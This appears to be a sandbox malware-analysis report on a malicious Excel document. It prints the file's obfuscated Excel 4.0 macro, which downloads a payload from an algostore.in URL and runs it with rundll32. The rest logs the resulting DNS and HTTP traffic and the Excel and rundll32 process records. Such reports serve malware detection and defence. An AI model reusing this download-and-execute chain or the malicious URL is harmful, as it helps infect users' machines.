                ,,,,,,,,,,,,,,,,,,,,http://www.algostore.in/algostoreold/printme.php,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,..\hdoanal.sbl,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,RL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,UR,,JJC,,,,,,,,,,,,,,,,,,,,,,,,,,LDow,CBB,,,,,,,,,,,,,,,,,,,,,,,,nload,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ToFil,,,,,,,,,,,,,,,,,,,,,,,,,,,eA,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,,,",St",a,,,,,,,,,,,,,,,,,,,,,,,u,,,rt,,,,,,,,,,,,,,,,,,,,,,,,ndl,,,W,,,,,,,,,,,,,,,,,,,,,,,,l32 ,,,,,,,,,,,,,,,,,,,,,Mo,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,

                Network Behavior

                Network Port Distribution

                TCP Packets

                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Apr 8, 2021 18:31:14.575733900 CEST | 49165 | 80 | 192.168.2.22 | 103.212.121.53
                Apr 8, 2021 18:31:17.583440065 CEST | 49165 | 80 | 192.168.2.22 | 103.212.121.53
                Apr 8, 2021 18:31:23.636692047 CEST | 49165 | 80 | 192.168.2.22 | 103.212.121.53

                UDP Packets

                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Apr 8, 2021 18:31:14.504771948 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                Apr 8, 2021 18:31:14.560906887 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22

                DNS Queries

                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                Apr 8, 2021 18:31:14.504771948 CEST | 192.168.2.22 | 8.8.8.8 | 0xa4ce | Standard query (0) | www.algostore.in | A (IP address) | IN (0x0001)

                DNS Answers

                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                Apr 8, 2021 18:31:14.560906887 CEST | 8.8.8.8 | 192.168.2.22 | 0xa4ce | No error (0) | www.algostore.in | algostore.in | | CNAME (Canonical name) | IN (0x0001)
                Apr 8, 2021 18:31:14.560906887 CEST | 8.8.8.8 | 192.168.2.22 | 0xa4ce | No error (0) | algostore.in | | 103.212.121.53 | A (IP address) | IN (0x0001)

                Code Manipulations

                Statistics

                CPU Usage

                Memory Usage

                High Level Behavior Distribution

                Behavior

                System Behavior

                General

                Start time:18:30:37
                Start date:08/04/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13fa10000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:31:02
                Start date:08/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\hdoanal.sbl,StartW
                Imagebase:0xffca0000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis
